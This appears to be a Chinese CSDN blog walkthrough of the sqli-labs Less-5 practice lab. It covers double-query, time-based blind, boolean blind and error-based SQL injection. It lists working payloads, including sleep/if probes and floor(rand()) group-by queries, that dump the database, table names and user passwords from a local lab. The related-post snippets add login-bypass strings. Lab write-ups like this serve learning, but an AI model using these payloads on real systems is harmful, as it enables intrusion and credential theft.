sqli-labs通关-------05lesson-double_injection_single_quotes(盲注)

最新推荐文章于 2022-07-09 15:18:35 发布
最新推荐文章于 2022-07-09 15:18:35 发布
阅读量215 收藏
点赞数
分类专栏: 安全 sql注入学习总结 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39584315/article/details/90719133
版权

一进来让我们数据id

然后???

到这来我们解释一下名词

http://www.91ri.org/7636.html

介绍一下双查询注入,什么叫双查询注入,这个有点难以解释,通俗的来说就是嵌套子查询。我们理解一下子查询,查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询。

这种方法适用于注入的时候没有返回位,但是有返回位的时候也适用,不过又返回位的时候就不建议在、用这个啦!返回位就是你们union select 1,2,3,4,5,6,7,8 这里是8个字段

 

对于这种没有回显的 判断为盲注(时间盲注 布尔盲注)根据他博客蛇皮团团怪还有可能是报错注入。

1.时间盲注

延迟注入一般会用到下面几个函数:

sleep()                             //延迟函数
if(condition,true,false)               //条件语句      
ascii()                              //转换成ascii
substring("string",strart,length) 

left(string,length)

首先我们继续通过id=1,id=1’, id=1), id=1’) id=1”  发现id=1’)出错了

So 判断应该是单引号闭合

 

 

然和我们尝试sleep(5)

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+

发现有明显延迟了

发现盲注就继续想办法搞数据库名 表名 字段名。。。。一般没有人用手工 多用sqlmap,这里我们多为了学习

发现有延迟该咋办呢,用if大法强行判断,一般会累死。。。。。

我们先判断数据库长度,函数定义已经在上面给了。发现当长度是8的时候明显延迟

http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and if(length(database())=8,sleep(5),1)--+

然后通过字符判断substring 开始位置是从1开始的

http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and if(substring(database(),1,1)='s',sleep(5),1)--+

然后就挨个尝试吧

http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and if(substring(database(),1,2)='se',sleep(5),1)--+

大约一年后………..

我们得到了库名 security

 

然后我们有大概通过十年的尝试挨个报出来了数据库名称*(自己写脚本或者sqlmap)

http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and if(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,6)="emails",sleep(5),1)--+

然后就通过这种方式漫长的时间后我们搞到了密码

 

2.布尔盲注

我们通过有无回显以及二分法判断数据库名称及表名及字段

http://127.0.0.1:90/sqli-labs/Less-5/?id=1’and substring((select database()),1,1)<’t’--+

http://127.0.0.1:90/sqli-labs/Less-5/?id=1’ and substring((select database()),1,1)>’t’--+

三,concat

之前我们在lesson1里面说过extractvalue()和updatexml()报错注入现在又发现concat

 

http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password)from users)))--+

但是本来我想尝试一下concat 可惜我的mysql把我给禁了到此结束 为了本篇完整复制一波

 

作者:蛇皮团团怪

原文:https://blog.csdn.net/qq_41420747/article/details/81836327

 

爆库payload

 

?id=-1'union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

//或者

?id=-1'union select count(*),1, concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

//注意本本方法具有随机性,原理待研究

爆用户payload

 

?id=-1' union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a--+

爆表名payload

 

?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

 修改limit x,1 可以遍历表名,找到user这个表,猜测它存放username和password

 

爆列名payload

 

?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

  修改limit x,1 可以遍历列名,找到username和password列

 

爆字段payload

 

?id=-1' union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

 

修改limit x,1 可以显示第x个用户的password和username  (‘[’是分隔符)

 

注入结束。

 

枯藤闲画云
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab教程——Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
luosaierdadi的博客
07-06 312
如果看到这个报错信息,第一反应就是布尔型盲注、报错型注入、时间延迟型盲注了下面给出验证时间延迟型的盲注:http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+发现明显延迟,说明猜测正确。接下来的思路是通过延迟,依次爆破数据库长度,数据库名,表名,列名,以及字段。布尔型和时间延迟型盲注建议采用sqlmap去跑。其实本题不能称作盲注,因为存在回显,真正的盲注时不存在回显的,只能根据浏览器加载页面情况,判定是否注入成功。......
SQL注入攻击】GET-Double Injection-Single Quotes-String(双注入GET单引号字符型注入)
sm1918451478的博客
10-31 454
SQL注入攻击】GET-Double Injection-Single Quotes-String(双注入GET单引号字符型注入)
sqli-lab教程——1-35通关
缘木之鱼
05-08 5765
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
SQLi_LABS less5: GET-Double Injection - Single Quotes - String
dongchijue7318的博客
08-19 209
目录 前言 几种可能的注入方式 补充的相关知识点 前言 最近开始用SQLi_LABS学习注入,刚开始有点摸不到头脑,索性把看到的知识点记录下来,很多细节是看别人博客学的,就直接给链接了,在此向这些作者们表示衷心的感谢。主要为了自己学习记录,如果能帮到别人当然就更好了。有大神...
SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - String
xw1995115的博客
11-15 493
本节练习涉及到了一个新的概念:双注入。 双注入简单理解为一个select查询里嵌套一个select查询,如果要利用双注入需要人为构造特定的能够造成报错的查询,从而在报错信息里返回我们需要的数据。需要用到的函数和语句有: 1.concat() 作用为连接括号里的参数。例concat(1,~,2) 结果为 1~2 2.floor() 作用为对括号里的非整数进行取整 如1.9取为1,2.1取为2 3.count() 作用为针对查询结果条数进行计数 4.rand() 作用为生成0-1范围内的随机数...
sqli-labs练习(五)------GET-Double injection-Single Quotes-String
wkend的博客
04-17 905
按提示,输入id参数1,得到回馈结果,但是没用 输入1',报错 查看报错信息near ''1'' LIMIT 0,1' at line 1 输入参数1'',没有报错, 通过以上过程可以发现,当我们改变参数的时候,回显只有两种结果 1&gt;You are in........... 2&gt; 报错信息 没办法,正确的查询只返回第一种情况,那么只能靠第二种回显结果了,...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs练习(十四)--- POST-Double Injection-Single quotes-String-with twist
wkend的博客
07-26 439
这一关与上一关很相似,唯一的区别就在于是采用双引号来闭合的, 直接可以用万能密码成功登录,比如123" or 1=1# 在获取数据库信息是把')替换为"即可。 payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_s...
sqli-labs less 13 POST -Double injection -Single quotes -String -with twist
Monster1m的博客
01-19 127
13关的话也没有什么特殊的,和十二关的顺序啊payload啊一模一样,不过13关的闭合方式是’),所以直接参考12就好了 12链接: https://blog.csdn.net/Monster1m/article/details/112850142
sqli-labs练习(十三)--- POST-Double Injection-Single quotes-String-with twist
wkend的博客
07-26 307
payload:uname=123 or 1=1#&amp;amp;amp;passwd=111&amp;amp;amp;submit=Submit,登录失败 payload:uname=123' or 1=1#&amp;amp;amp;passwd=111&amp;amp;amp;submit=Submit, 报错You have an error in your SQL syntax; check the manual that correspon...
sqli-lab教程——Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
luosaierdadi的博客
07-09 781
通过报错可知 是通过') 闭合的发现没有登入成功返回信息 ,看来是要盲注了。方法一,报错型既然它返回错误信息了,说明有回显,可以报错注入。样例payloaduname=admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 在concat()中构造查询语句,完事,和less-12以及之前的报错型注入一样,不再赘述。方法二,时间型盲注因为可以报错注入,这个方法没有回显,就有点鸡肋了,给个样例payload:uname=admi
CTF解题-网安实验室(注入关)
道阻且长,行则将至。
09-03 4032
万能密码 【题目环境】 最简单的SQL注入 分值: 100 Tips:题目里有简单提示 通关地址 【解题过程】 查看网页源码,提示使用admin登录: 直接上万能密码——admin';#、admin' #、admin' or 1=1 #密码随便输,登录成功: ...
注入关
weixin_43245269的博客
06-29 664
注入关1 最简单的SQL注入 分值: 100 Tips题目里有简单提示 用户名:admin or '1=1' 密码:随意 成功! 注入关2 最简单的SQL注入(熟悉注入环境) 分值: 100 最简单的SQL注入 http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 or ‘1=1’ 获得flag。 -- 数字型注入点select * from 表名 where id=1 http://xxx
hackinglab.cn 注入关之一
r00tnb的博客
12-15 3787
题目: Tips题目里有简单提示. writeup: 第一关应该挺简单的。 点击题目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: &lt;!-- Tips login as admin--&gt; 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
注入关1
weixin_30410999的博客
07-16 416
老规矩,先看一下题目: 最简单的SQL注入分值: 100 Tips题目里有简单提示 行吧,我猜是万能密码,你觉得呢???OK,点进去,Look,Look 看到了三个输入框呀,有木有,于是乎,直接上一套万能密码 需要注意的两点:   1、对应--注释,后面得加至少一个空格,否则没有注释效果   2、这个网站之前的验证码真的是让人眼瞎啊!!!!...
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值